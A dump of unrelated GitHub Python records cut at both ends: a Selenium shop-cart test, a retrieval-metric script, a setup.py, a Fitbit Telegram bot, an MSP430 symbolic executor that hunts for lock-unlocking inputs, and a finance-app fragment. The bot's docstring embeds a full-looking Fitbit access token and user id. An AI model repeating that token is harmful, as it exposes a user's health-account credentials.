number_of_items_element = WebDriverWait(pytest.driver, 10).until(presence_of_element_located((By.XPATH, '//*[@id=\"menu_basket\"]/a[1]/span[1]')))\n total_amount_element = WebDriverWait(pytest.driver, 10).until(presence_of_element_located((By.XPATH, '//*[@id=\"menu_basket\"]/a[1]/strong[1]')))\n assert item_number == int(number_of_items_element.text)\n assert total_amount_to_pay == split_price_and_convert_to_float(total_amount_element.text)\n\n\ndef open_item_on_screen(item_name):\n screen_item = get_item_from_the_screen(item_name)\n item_price = get_item_price(screen_item)\n url_to_open = screen_item.find_elements_by_xpath('.//a')[1].get_attribute('href')\n pytest.driver.get(url_to_open)\n return item_price\n\n\ndef get_item_price(item_on_screen):\n item_text = item_on_screen.text\n item_text_array = item_text.split('\\n')\n item_price_text = item_text_array[len(item_text_array) - 2]\n return split_price_and_convert_to_float(item_price_text)\n\ndef split_price_and_convert_to_float(price_text):\n item_price_splited = price_text.split()\n return float(item_price_splited[0].replace(',', '.'))\n\n\ndef add_current_item_to_cart():\n size_button = WebDriverWait(pytest.driver, 10).until(presence_of_element_located((By.XPATH, '//*[@id=\"projector_sizes_cont\"]/div[1]/a[1]')))\n size_button.click()\n\n add_to_cart_button = WebDriverWait(pytest.driver, 10).until(presence_of_element_located((By.ID, 'projector_button_basket')))\n add_to_cart_button.click()\n\ndef close_cart_dialog():\n close_dialog_button = WebDriverWait(pytest.driver, 10).until(presence_of_element_located((By.ID, 'dialog_close')))\n close_dialog_button.click()\n\n\ndef get_item_from_the_screen(item_text):\n all_search_div_elements = pytest.driver.find_elements_by_xpath('//*[@id=\"search\"]/div')\n filtered_items = []\n for div_element in all_search_div_elements:\n if item_text in div_element.text:\n filtered_items.append(div_element)\n\n return filtered_items[0]\n\ndef search_page_for_shorts():\n pytest.driver.find_element_by_id('menu_search_text').send_keys('Шорти жіночі')\n search_button = WebDriverWait(pytest.driver, 10).until(presence_of_element_located((By.XPATH, '//*[@id=\"menu_search\"]/button[1]')))\n search_button.click()\n\n target_text = pytest.driver.find_element_by_css_selector(\"div#content > div > h1\").text\n assert \"Результати пошуку\" == target_text\n items_number_label = pytest.driver.find_element_by_xpath(\"//*[@id=\\\"content\\\"]/div[1]/span[1]/b[1]\").text\n number_of_all_shorts_found = int(items_number_label)\n assert number_of_all_shorts_found > 0","repo_name":"NataliMigunova/SkillFactory_Final_project","sub_path":"Test_cart_functionality.py","file_name":"Test_cart_functionality.py","file_ext":"py","file_size_in_byte":5732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14635949762","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 12 13:59:15 2022\r\n\r\n@author: CEOSpaceTech\r\n\"\"\"\r\nF_score1 =[]\r\nF_score2 =[]\r\npresall =[]\r\nP_all=[] \r\nfor n in range(10):\r\n normal_class = n\r\n retrievd_number = 60\r\n test_number =[600,600,600,500,500,400,500,600,500,600]\r\n relevant_number = 400 #test_number[normal_class]\r\n lines = []\r\n\r\n f=open('D:/Omid/UPB/Journal/Deep-SVDD/EuroSAT/TSNE/one vs one/MS/org/'+str(normal_class)+'/1/sort.txt','r') \r\n \r\n lines = f.readlines()\r\n Presicion=[]\r\n for k in [20,60,100,200,350]:\r\n count_p = 0 \r\n for i in range(k):\r\n if int(lines[i][-3])==normal_class:\r\n count_p +=1\r\n 
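
The test suite above repeats the WebDriverWait + presence_of_element_located incantation at every interaction point; a tiny shared helper keeps the explicit-wait pattern in one place (the helper name is mine, not the suite's):

from selenium.webdriver.common.by import By
from selenium.webdriver.support.expected_conditions import presence_of_element_located
from selenium.webdriver.support.wait import WebDriverWait

def wait_for(driver, locator, timeout=10):
    # block until the element is present in the DOM, then return it
    return WebDriverWait(driver, timeout).until(presence_of_element_located(locator))

# usage sketch, reusing the cart badge XPath from the assertions above:
# badge = wait_for(pytest.driver, (By.XPATH, '//*[@id="menu_basket"]/a[1]/span[1]'))
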
\r\n P = round((count_p /k),3)\r\n Presicion.append(P)\r\n pres=Presicion[0]\r\n P_all.append(Presicion)\r\n presall.append(pres)\r\n \r\n count_r = 0 \r\n for i in range(relevant_number):\r\n if int(lines[i][-3])==normal_class:\r\n count_r +=1\r\n R =round((count_r /relevant_number),3)\r\n \r\n \r\n # print(PR)\r\n F1=round((2*Presicion[0]*R)/(Presicion[0]+R+0.000000005),3)\r\n F2=round((5*Presicion[0]*R)/(4*Presicion[0]+R+0.000000005),3)\r\n F_score1.append(F1)\r\n F_score2.append(F2)\r\n print(R)\r\n","repo_name":"omid-ghozatlou/Query-by-Example-Using-SVDD","sub_path":"IR_evaluation.py","file_name":"IR_evaluation.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17928173517","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport io\nimport os\nfrom setuptools import setup\n\nDEPENDENCIES = ['pandas==1.5.3',\n'numpy==1.21.0',\n'SQLAlchemy==2.0.12',\n'scipy==1.7.3',\n'ipykernel==6.9.1',\n'ipython==8.2.0',\n'ipython-genutils==0.2.0',\n'ipywidgets==7.6.5',\n'jupyterlab==3.3.2',\n'mysql-connector-python==8.0.29']\n\nCURDIR = os.path.abspath(os.path.dirname(__file__))\n\nwith io.open(os.path.join(CURDIR, \"README.md\"), \"r\", encoding=\"utf-8\") as f:\n README = f.read()\n\nsetup(\n name=\"SLKB\",\n version=\"1.0.11\",\n author=\"Birkan Gökbağ\",\n author_email=\"birkan.gokbag@gmail.com\",\n description=\"SLKB: Synthetic lethality knowledge base for gene combination double knockout experiments\",\n long_description=README,\n url=\"https://github.com/BirkanGokbag/SLKB-Analysis-Pipeline\",\n package_dir={'SLKB': 'SLKB'},\n packages=['SLKB'],\n include_package_data=True,\n keywords=[],\n scripts=[],\n zip_safe=False,\n install_requires=DEPENDENCIES,\n license=\"License :: OSI Approved :: GPL 3.0\",\n classifiers=[\n \"Programming Language :: Python\",\n \"Operating System :: OS Independent\",\n ],\n)","repo_name":"BirkanGokbag/SLKB-Analysis-Pipeline","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"14632089611","text":"import time\r\nimport datetime\r\nimport pyfiglet\r\nimport logging\r\nimport logging.config\r\nimport os\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nfrom dotenv import load_dotenv, find_dotenv\r\nmatplotlib.use('Agg')\r\nimport subprocess\r\n\r\nload_dotenv(find_dotenv())\r\n\r\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup\r\nfrom telegram.ext import (\r\n Updater,\r\n CommandHandler,\r\n MessageHandler,\r\n Filters,\r\n CallbackQueryHandler,\r\n)\r\nimport telegram\r\n\r\nfrom _model import *\r\n\r\nfrom fitbit_api.access_data import *\r\n\r\nfrom tinydb import TinyDB, Query\r\n# Database in json format\r\ndb = TinyDB(\"db.json\")\r\ndb_query = Query()\r\n\r\n\r\n# insert user in database\r\ndef insert_user(update):\r\n user = get_user(update)\r\n if user is not None and len(db.search(db_query.id == user.id)) == 0:\r\n db.insert({'id': user.id, 'first_name': user.first_name, 'last_name': user.last_name})\r\n logging.info(f\"{user.id} added to database\")\r\n\r\n# search database for user\r\ndef search_user(update):\r\n user = get_user(update)\r\n return db.search(db_query.id == user.id)[0]\r\n\r\n#get chat id\r\ndef get_chat_id(update, context):\r\n chat_id = -1\r\n\r\n if update.message is not None:\r\n chat_id = update.message.chat.id\r\n elif update.callback_query is not None:\r\n 
chat_id = update.callback_query.message.chat.id\r\n elif update.poll is not None:\r\n chat_id = context.bot_data[update.poll.id]\r\n\r\n return chat_id\r\n\r\n#get user information\r\ndef get_user(update):\r\n user: User = None\r\n\r\n _from = None\r\n\r\n if update.message is not None:\r\n _from = update.message.from_user\r\n elif update.callback_query is not None:\r\n _from = update.callback_query.from_user\r\n\r\n if _from is not None:\r\n user = User()\r\n user.id = _from.id\r\n user.username = _from.username if _from.username is not None else \"\"\r\n user.first_name = _from.first_name if _from.first_name is not None else \"\"\r\n user.last_name = _from.last_name if _from.last_name is not None else \"\"\r\n user.lang = _from.language_code if _from.language_code is not None else \"n/a\"\r\n return user\r\n\r\ndef start_command_handler(update, context):\r\n \"\"\"Send a message when the command /start is issued.\"\"\"\r\n insert_user(update)\r\n user = search_user(update)\r\n update.message.reply_text(f\"Hi {user['first_name']}! I'm a IndHealth, thanks for joining !!!!\")\r\n update.message.reply_text(\"I'm here to help you with your health summary\")\r\n update.message.reply_text(\"Please type /help for more information\")\r\n update.message.reply_text(\"\\n\\nTo get started, please type app name for example for fitbit /app fitbit and for xiomi /app xiomi\")\r\n\r\n\r\ndef add_app_type(update, context):\r\n app_name = get_text_from_message(update).split(\" \")[1]\r\n add_typing(update, context)\r\n\r\n if app_name == \"fitbit\" or app_name == \"xiomi\":\r\n user = search_user(update)\r\n db.update({'app_name': app_name}, db_query.id==user['id'])\r\n add_text_message(update, context, f\"You selected app type {app_name}\")\r\n\r\n url = call_authorization_url()\r\n add_text_message(update, context, f\"Please enter your access token and user id after authenticating from {url}\")\r\n else:\r\n add_text_message(update, context, \"Please select a valid app type\")\r\n\r\ndef add_access_token(update, context):\r\n access_token = get_text_from_message(update).split(\" \")[1]\r\n user = search_user(update)\r\n db.update({'access_token': access_token}, db_query.id==user['id'])\r\n add_typing(update, context)\r\n add_text_message(update, context, f\"Your access token is stored with us\")\r\n\r\ndef add_user_id(update, context):\r\n user_id = get_text_from_message(update).split(\" \")[1]\r\n user = search_user(update)\r\n db.update({'user_id': user_id}, db_query.id==user['id'])\r\n add_typing(update, context)\r\n add_text_message(update, context, f\"Your user id is stored with us\")\r\n\r\n\r\ndef get_today_running_steps(update, context):\r\n user = search_user(update)\r\n today_steps = get_walking_data(user['access_token'], user['user_id'])\r\n add_typing(update, context)\r\n if not today_steps==False:\r\n add_text_message(update, context, f\"Today you have run {today_steps} steps\")\r\n logging.info(f\"User {user['id']} has run {today_steps} steps\")\r\n else:\r\n add_text_message(update, context, f\"Error while getting data\")\r\n logging.info(f\"Error while getting data for user {user['id']}\")\r\n\r\ndef get_7d_weight_log(update, context):\r\n user = search_user(update)\r\n weight_7d = get_weight_log(user['access_token'], user['user_id'])\r\n add_typing(update, context)\r\n if not weight_7d==False:\r\n weight_7d_string = \"\"\r\n for i in weight_7d:\r\n weight_7d_string += i + \", \"\r\n add_text_message(update, context, f\"Your body weight over the last 7 days were {weight_7d_string}\")\r\n 
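
insert_user above guards db.insert with a search to avoid duplicate rows; TinyDB can do the same in one call with upsert. A sketch against the same db.json layout:

from tinydb import TinyDB, Query

db = TinyDB("db.json")
user_query = Query()

def upsert_user(user_id, first_name, last_name):
    # inserts the record, or updates it in place when this id already exists
    db.upsert({"id": user_id, "first_name": first_name, "last_name": last_name},
              user_query.id == user_id)
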
logging.info(f\"User {user['id']} body weight over the last 7 days were {weight_7d_string}\")\r\n else:\r\n add_text_message(update, context, f\"Error while getting data\")\r\n logging.info(f\"Error while getting data for user {user['id']}\")\r\n\r\n\r\ndef get_7d_weight_vis(update, context):\r\n user = search_user(update)\r\n weight_7d = get_weight_log(user['access_token'], user['user_id'])\r\n\r\n last_7d_dates = [] \r\n today = datetime.date.today()\r\n for i in range(0,7):\r\n last_7d_dates.append(today - datetime.timedelta(days=i))\r\n\r\n sample = [1,2,3,4,5,6,7]\r\n\r\n add_typing(update, context)\r\n if not weight_7d==False:\r\n weight_7d_list = []\r\n for i in weight_7d:\r\n weight_7d_list.append(float(i))\r\n \r\n plt.figure(figsize=(16, 6))\r\n plt.plot(last_7d_dates, weight_7d_list) # create figure & 1 axis\r\n plt.ylabel('Weight')\r\n plt.xlabel('Date')\r\n plt.savefig(\"name.png\")\r\n ans = subprocess.check_output(['postimg', 'name.png', '--html'])\r\n ans = ans.decode('utf-8')\r\n index_start = ans.index(\"https://\")\r\n index_end = ans.index(\"png\")\r\n index_end = index_end + 3\r\n img_link = ans[index_start:index_end]\r\n\r\n print(\"Generated and forwarded the Visualiation\", img_link) \r\n add_text_message(update, context, f\"Here is your body weight data for the last 7 days\")\r\n add_text_message(update, context, f\"Visualization Link: {img_link}\")\r\n\r\n\r\n # logging.info(f\"User {user['id']} body weight over the last 7 days were {weight_7d_list}\")\r\n else:\r\n add_text_message(update, context, f\"Error while getting data\")\r\n logging.info(f\"Error while getting data for user {user['id']}\")\r\n\r\n\r\n\r\n\r\n\r\ndef help_command_handler(update, context):\r\n \"\"\"Send a message when the command /help is issued.\"\"\"\r\n update.message.reply_text(\"Type /start\")\r\n\r\ndef new_member(update, context):\r\n logging.info(f\"new_member : {update}\")\r\n add_typing(update, context)\r\n add_text_message(update, context, f\"New user\")\r\n\r\ndef main_handler(update, context):\r\n if update.message is not None:\r\n add_typing(update, context)\r\n add_text_message(update, context, f\"Not a valid command\")\r\n\r\n\r\ndef add_typing(update, context):\r\n context.bot.send_chat_action(\r\n chat_id=get_chat_id(update, context),\r\n action=telegram.ChatAction.TYPING,\r\n timeout=1,\r\n )\r\n time.sleep(1)\r\n\r\ndef add_text_message(update, context, message):\r\n context.bot.send_message(chat_id=get_chat_id(update, context), text=message)\r\n\r\ndef add_suggested_actions(update, context, response):\r\n options = []\r\n\r\n for item in response.items:\r\n options.append(InlineKeyboardButton(item, callback_data=item))\r\n\r\n reply_markup = InlineKeyboardMarkup([options])\r\n\r\n context.bot.send_message(\r\n chat_id=get_chat_id(update, context),\r\n text=response.message,\r\n reply_markup=reply_markup,\r\n )\r\n\r\n\r\ndef get_text_from_message(update):\r\n return update.message.text\r\n\r\ndef get_text_from_callback(update):\r\n return update.callback_query.data\r\n\r\ndef error(update, context):\r\n \"\"\"Log Errors caused by Updates.\"\"\"\r\n logging.warning('Update \"%s\" ', update)\r\n logging.exception(context.error)\r\n\r\n\r\ndef main():\r\n updater = Updater(DefaultConfig.TELEGRAM_TOKEN, use_context=True)\r\n\r\n dp = updater.dispatcher\r\n\r\n # command handlers\r\n dp.add_handler(CommandHandler(\"help\", help_command_handler))\r\n dp.add_handler(CommandHandler(\"start\", start_command_handler))\r\n\r\n # app command handlers\r\n 
dp.add_handler(CommandHandler(\"app\", add_app_type))\r\n dp.add_handler(CommandHandler(\"access_token\", add_access_token))\r\n dp.add_handler(CommandHandler(\"user_id\", add_user_id))\r\n\r\n # summary command handlers\r\n dp.add_handler(CommandHandler(\"today_steps\", get_today_running_steps))\r\n\r\n dp.add_handler(CommandHandler(\"weight_logs\", get_7d_weight_log))\r\n dp.add_handler(CommandHandler(\"weight_logs_graph\", get_7d_weight_vis))\r\n\r\n\r\n # message handler\r\n dp.add_handler(MessageHandler(Filters.text, main_handler))\r\n\r\n dp.add_handler(MessageHandler(Filters.status_update.new_chat_members, new_member))\r\n\r\n # suggested_actions_handler\r\n dp.add_handler(\r\n CallbackQueryHandler(main_handler, pass_chat_data=True, pass_user_data=True)\r\n )\r\n\r\n # log all errors\r\n dp.add_error_handler(error)\r\n\r\n # Start the Bot\r\n if DefaultConfig.MODE == \"webhook\":\r\n\r\n updater.start_webhook(\r\n listen=\"0.0.0.0\",\r\n port=int(DefaultConfig.PORT),\r\n url_path=DefaultConfig.TELEGRAM_TOKEN,\r\n )\r\n updater.bot.setWebhook(DefaultConfig.WEBHOOK_URL + DefaultConfig.TELEGRAM_TOKEN)\r\n\r\n logging.info(f\"Start webhook mode on port {DefaultConfig.PORT}\")\r\n else:\r\n updater.start_polling()\r\n logging.info(f\"Start polling mode\")\r\n\r\n updater.idle()\r\n\r\n\r\nclass DefaultConfig:\r\n PORT = int(os.environ.get(\"PORT\", 3978))\r\n TELEGRAM_TOKEN = os.environ.get(\"TELEGRAM_TOKEN\", \"\")\r\n MODE = os.environ.get(\"MODE\", \"polling\")\r\n WEBHOOK_URL = os.environ.get(\"WEBHOOK_URL\", \"\")\r\n\r\n LOG_LEVEL = os.environ.get(\"LOG_LEVEL\", \"INFO\").upper()\r\n\r\n @staticmethod\r\n def init_logging():\r\n logging.basicConfig(\r\n format=\"%(asctime)s - %(levelname)s - %(message)s\",\r\n level=DefaultConfig.LOG_LEVEL,\r\n )\r\n\r\n\r\nif __name__ == \"__main__\":\r\n ascii_banner = pyfiglet.figlet_format(\"IndHealthBot\")\r\n print(ascii_banner) \r\n\r\n # Enable logging\r\n DefaultConfig.init_logging()\r\n\r\n #start server\r\n main()\r\n\r\n\"\"\"\r\nSample Tokens\r\n\r\naccess_token = \r\neyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiIyMzgyWkMiLCJzdWIiOiI5UURNTlEiLCJpc3MiOiJGaXRiaXQiLCJ0eXAiOiJhY2Nlc3NfdG9rZW4iLCJzY29wZXMiOiJyc29jIHJzZXQgcmFjdCBybG9jIHJ3ZWkgcmhyIHJwcm8gcm51dCByc2xlIiwiZXhwIjoxNjQwMTE4NjY0LCJpYXQiOjE2Mzk1NTg5OTF9.NeLoWtkiOeXOaKjsdl7_8xps89wuORliVf-EuyOZSAY\r\nuser_id = \r\n9QDMNQ\r\n\r\n\"\"\"","repo_name":"anmolkr186/IndHealth","sub_path":"telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":10895,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"32457199767","text":"from copy import copy\nimport random\nimport z3\n\nfrom .code import decode_instruction, Opcode, AddressingMode, Register\nfrom .memory import Memory, parse_mc_memory_dump\nfrom .cpu import CPU\nfrom .symio import IO, IOKind\n\nclass Path:\n \"\"\"\n The path predicate through the program.\n\n Call .add() to add a condition to the path\n\n Call .pred() to get a predicate suitable for Z3\n\n Call .clone() to get a copy-on-write version of the path\n \"\"\"\n def __init__(self, paths=None):\n if paths is None:\n self._path = []\n else:\n self._path = paths\n self.__needs_copying = False\n self.model = None\n self._model_cache = {}\n self.sat = None # unknown\n\n def add(self, condition):\n \"\"\"\n Add a condition to this path\n \"\"\"\n if self.__needs_copying:\n self._path = copy(self._path)\n self.__needs_copying = False\n self._path.append(condition)\n self.model = None\n self.sat = None\n\n def 
make_unsat(self):\n \"\"\"\n Helper function to make this state unsat\n \"\"\"\n self.add(False)\n\n def pred(self):\n \"\"\"\n Get the predicate for this path, suitable to throw at Z3\n \"\"\"\n # Cache the predicate, as testing has found this gives\n # a 3-4x improvement to execution speed\n pred = z3.And(*self._path)\n # simplifying here makes things a bit (~5-10%) faster...\n # strange that Z3 doesn't do that internally\n pred = z3.simplify(pred)\n self._path = [pred]\n self.__needs_copying = False\n return pred\n\n def is_sat(self):\n # if we've cached whether we're sat, just return that\n if self.sat is not None:\n return self.sat\n # if we're in the global cache, use that\n if self.pred() in self._model_cache:\n self.sat, self.model = self._model_cache[self.pred()]\n return self.sat\n solver = z3.Solver()\n solver.add(self.pred())\n is_sat = solver.check() == z3.sat\n self.sat = is_sat\n if is_sat:\n self.model = solver.model()\n\n # Save sat results back to global cache\n self._model_cache[self.pred()] = (self.sat, self.model)\n\n return is_sat\n\n def clone(self):\n new_path = Path(self._path)\n new_path.__needs_copying = True\n self.__needs_copying = True\n # pass along our model so sat checks quick-exit as long as nothing is added\n new_path.model = self.model\n new_path.sat = self.sat\n\n new_path._model_cache = self._model_cache # NOT A COPY -- GLOBAL CACHE\n return new_path\n\n def __repr__(self):\n return 'Path({})'.format(self._path)\n\n\nclass State:\n \"\"\"\n Entire encapsulation of the current state of the machine (register, memory),\n plus all the interrupts (and their associated summary functions)\n \"\"\"\n def __init__(self, cpu, memory, path, sym_input, sym_output, unlocked, ticks=0):\n self.cpu = cpu\n self.memory = memory\n self.path = path\n self.sym_input = sym_input\n self.sym_output = sym_output\n self.unlocked = unlocked\n self.ticks = ticks\n\n def step(self, enable_unsound_optimizations=True):\n \"\"\"\n Tick the cpu forward one instruction.\n\n Returns a list of successor states.\n \"\"\"\n instruction_pointer = self.cpu.registers[Register.R0]\n if z3.is_bv(instruction_pointer):\n instruction_pointer = z3.simplify(instruction_pointer).as_long()\n# pull enough to encode any instruction\n raw_instruction = \\\n self.memory[instruction_pointer : instruction_pointer + 6]\n instruction, instruction_length = \\\n decode_instruction(instruction_pointer, raw_instruction)\n #print(instruction, instruction_length)\n\n step_functions = {\n Opcode.RRC: self.cpu.step_rrc,\n Opcode.SWPB: self.cpu.step_swpb,\n Opcode.RRA: self.cpu.step_rra,\n Opcode.SXT: self.cpu.step_sxt,\n Opcode.PUSH: self.cpu.step_push,\n Opcode.CALL: self.cpu.step_call,\n Opcode.RETI: self.cpu.step_reti,\n Opcode.JNZ: self.cpu.step_jnz,\n Opcode.JZ: self.cpu.step_jz,\n Opcode.JNC: self.cpu.step_jnc,\n Opcode.JC: self.cpu.step_jc,\n Opcode.JN: self.cpu.step_jn,\n Opcode.JGE: self.cpu.step_jge,\n Opcode.JL: self.cpu.step_jl,\n Opcode.JMP: self.cpu.step_jmp,\n Opcode.MOV: self.cpu.step_mov,\n Opcode.ADD: self.cpu.step_add,\n Opcode.ADDC: self.cpu.step_addc,\n Opcode.SUBC: self.cpu.step_subc,\n Opcode.SUB: self.cpu.step_sub,\n Opcode.CMP: self.cpu.step_cmp,\n Opcode.DADD: self.cpu.step_dadd,\n Opcode.BIT: self.cpu.step_bit,\n Opcode.BIC: self.cpu.step_bic,\n Opcode.BIS: self.cpu.step_bis,\n Opcode.XOR: self.cpu.step_xor,\n Opcode.AND: self.cpu.step_and,\n }\n self.cpu.registers[Register.R0] += instruction_length # preincrement ip\n instruction_fn = step_functions[instruction.opcode]\n successor_states 
= instruction_fn(self, instruction, \\\n enable_unsound_optimizations=enable_unsound_optimizations)\n return successor_states\n\n def clone(self):\n return self.__class__(self.cpu.clone(), self.memory.clone(), self.path.clone(), self.sym_input.clone(), self.sym_output.clone(), self.unlocked, self.ticks+1)\n\n def has_symbolic_ip(self):\n ip = self.cpu.registers[Register.R0]\n return z3.is_bv(ip) and not isinstance(z3.simplify(ip), z3.BitVecNumRef)\n\n def decode_some_instructions(self, ip, n):\n \"\"\"\n Decodes **up to** :n: instructions, starting at :ip:\n\n Stops at ret instructions\n \"\"\"\n\n # ret == mov @sp+, pc, so we have to do this huge thing\n is_ret = lambda insn: insn.opcode == Opcode.RETI or \\\n (insn.opcode == Opcode.MOV and \\\n insn.source_addressing_mode == AddressingMode.AUTOINCREMENT and \\\n insn.source_register == Register.R1 and \\\n insn.dest_register == Register.R0)\n\n instructions = []\n for _ in range(n):\n raw_instruction = self.memory[ip : ip + 6]\n instruction, instruction_length = \\\n decode_instruction(ip, raw_instruction)\n \n instructions.append(instruction)\n ip += instruction_length\n # stop analyzing on ret since we don't know what\n # could be past there (end of memory, random data)\n if is_ret(instruction):\n break\n return instructions\n\n\nclass PathGroup:\n def __init__(self, active, avoid=None):\n self.active = set(active)\n self.unlocked = set() # states with the lock unlocked\n self.unsat = set()\n self.symbolic = set() # paths with symbolic control data\n self.recently_added = set()\n self.tick_count = 0\n if isinstance(avoid, int):\n avoid = (avoid,) # wrap int avoid in a tuple\n self.avoid = avoid\n\n def prune(self):\n \"\"\"\n Move any unsat states in this PathGroup that are in the active set to\n the unsat set\n \"\"\"\n sat_states = set()\n symbolic_states = set()\n unlocked_states = set()\n unsat_states = set()\n for state in self.active:\n\n if state.path.is_sat():\n if state.has_symbolic_ip():\n symbolic_states.add(state)\n\n if state.unlocked:\n unlocked_states.add(state)\n else:\n sat_states.add(state)\n else:\n #print('Marking state unsat:', state, state.path._path[-1])\n unsat_states.add(state)\n\n self.active = set(sat_states)\n self.unsat.update(unsat_states)\n self.unlocked.update(unlocked_states)\n self.symbolic.update(symbolic_states)\n\n def select_next_state(self):\n \"\"\"\n Select the next state to simulate from the active group, removing it\n from that group\n \"\"\"\n # TODO: more effective strategies?\n if len(self.active) > 64:\n choice = max(self.active, key=lambda st: st.ticks)\n else:\n choice = min(self.active, key=lambda st: st.ticks)\n self.active.discard(choice)\n return choice\n\n def step(self, enable_unsound_optimizations=True):\n path_to_sim = self.select_next_state()\n successors = set(path_to_sim.step(enable_unsound_optimizations=enable_unsound_optimizations))\n self.active.update(successors)\n self.recently_added = successors\n self.tick_count += 1\n\n for state in successors:\n # make states at an avoid_addr unsat\n # TODO: maybe check recent states?\n if self.avoid:\n def simplify(v):\n if z3.is_bv(v):\n v = z3.simplify(v).as_long()\n return v\n try:\n ip = simplify(state.cpu.registers[Register.R0])\n if ip in self.avoid:\n state.path.make_unsat()\n except AttributeError:\n pass # symbolic ip!! 
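
Path.is_sat above wraps a small amount of z3 machinery (conjoin, simplify, solve, cache the model). Stripped of the caching, the underlying calls look like this toy example with a hypothetical 16-bit constraint:

import z3

x = z3.BitVec("x", 16)
pred = z3.simplify(z3.And(x + 1 == 0x1000, (x & 1) == 1))

solver = z3.Solver()
solver.add(pred)
if solver.check() == z3.sat:
    # prints 4095, the odd 16-bit value satisfying both conjuncts
    print(solver.model()[x])
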
Ignore for now...\n\n self.prune() # prune unsat successors\n\n def step_until_symbolic_ip(self, enable_unsound_optimizations=True, debug_print=False):\n while self.active and not self.symbolic:\n self.step(enable_unsound_optimizations=enable_unsound_optimizations)\n print('==== Steps: {} == Active: {} == Unsat: {} ===='.format(self.tick_count, len(self.active), len(self.unsat)))\n if debug_print:\n for state in self.active:\n ip = state.cpu.registers['R0']\n if z3.is_bv(ip):\n ip = z3.simplify(ip).as_long()\n print('\\t', state)\n print('\\t\\tIP:', hex(ip))\n print('\\t\\tInput:', [x.rstrip(b'\\xc0') for x in state.sym_input.dump(state)])\n print('\\t\\tOutput:', repr(state.sym_output.dump(state)))\n\n\n def step_until_unlocked(self, enable_unsound_optimizations=True, debug_print=False):\n while self.active and not self.unlocked:\n self.step(enable_unsound_optimizations=enable_unsound_optimizations)\n print('==== Steps: {} == Active: {} == Unsat: {} ===='.format(self.tick_count, len(self.active), len(self.unsat)))\n if debug_print:\n for state in self.active:\n ip = state.cpu.registers['R0']\n if z3.is_bv(ip):\n ip = z3.simplify(ip).as_long()\n print('\\t', state)\n print('\\t\\tIP:', hex(ip))\n print('\\t\\tInput:', repr(state.sym_input.dump(state).rstrip(b'\\xc0')))\n print('\\t\\tOutput:', repr(state.sym_output.dump(state)))\n\n\n\ndef start_path_group(memory_dump, start_ip, avoid=None):\n \"\"\"\n Parse a memory dump, construct a base state, and return a PathGroup.\n \"\"\"\n mem = parse_mc_memory_dump(memory_dump)\n cpu = CPU()\n cpu.registers[Register.R0] = z3.BitVecVal(start_ip, 16)\n path = Path()\n inp = IO(IOKind.INPUT, [])\n out = IO(IOKind.OUTPUT, [])\n\n\n entry_state = State(cpu, mem, path, inp, out, False)\n pg = PathGroup([entry_state], avoid=avoid)\n return pg\n\n# shared instance of the backing memory so we don't need to keep building this\n# make sure blank_state returns a clone of it's state so we don't accidentally\n# reuse this instance!!\n__memory_data = [z3.BitVecVal(0, 8) for _ in range(0xFFFF)]\ndef blank_state():\n cpu = CPU()\n memory = Memory(__memory_data)\n path = Path()\n inp = IO(IOKind.INPUT, [])\n out = IO(IOKind.OUTPUT, [])\n # return a clone because we cache __memory_data\n return State(cpu, memory, path, inp, out, False).clone()\n","repo_name":"Hypersonic/msp430_symex","sub_path":"msp430_symex/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":12107,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"54"} +{"seq_id":"72470894882","text":"# <------------------------ Imports ------------------------------> #\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nimport numpy as np\nimport tkinter as tk\n\n# <--- MySQL Errors ---> #\nimport mysql.connector.errors as SQLErrors\n\n# <--- Miscellenaeous ---> #\nfrom typing import *\nimport csv\nimport datetime\nimport sys\n\n# <--- Self-Defined stuff ---> #\nfrom __init__ import conn, start_connection\nfrom funcs import *\n\n# <--- Matplotlib and PyPlot ---> #\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\n\n# <--- PySimpleGUI ---> #\nif sys.version >= \"3.0.0\":\n import PySimpleGUI as sg\n from PySimpleGUI import Window, T, Input, Button, Popup, PopupError, Submit, TabGroup, Tab, Multiline, Combo, CalendarButton, Table, PopupYesNo, Canvas\nelse:\n import PySimpleGUI27 as sg\n from PySimpleGUI27 import Window, T, Input, Button, Popup, PopupError, Submit, TabGroup, Tab, Multiline, Combo, CalendarButton, 
Table, PopupYesNo, Canvas\n\n# <------------------------- Useful Stuff ---------------------------------> #\n\n# tooltips = [\n# 'Log a new transaction',\n# 'Quickly jot down transactions and make calculations. Export them to a csv file',\n# 'View graphs of your expenditure and income history',\n# 'See all of your transactions'\n# ]\n\ngraph_active = False\n\nheading_format = {\n \"justification\": 'center',\n \"size\": (20, 1),\n \"font\": (\"Segoe\", 20)\n}\n\nyear = datetime.datetime.now().year\nmonth = datetime.datetime.now().month\nday = datetime.datetime.now().day\n\nmonths = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',\n 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']\n\nmonths_30 = ['Apr', 'Jun', 'Sep', 'Nov']\nmonths_31 = [month for month in months if month !=\n 'Feb' and month not in months_30]\nmonth_name = months[month-1]\ndays_in_month = 30 if month_name in months_30 else 31 if month_name in months_31 else 28\n# <----------------------- MySQL -----------------------------> #\n\n'''\n __ __ ____ ___ _\n | \\/ |_ _/ ___| / _ \\| |\n | |\\/| | | | \\___ \\| | | | |\n | | | | |_| |___) | |_| | |___\n |_| |_|\\__, |____/ \\__\\_\\_____|\n |___/\n\nHere below lie all the MySQL related functions.\nQueries, connectivity (actually in __init__.py, though), cursors, everything's here.\n'''\n\nstart_connection() # Starts MySQL 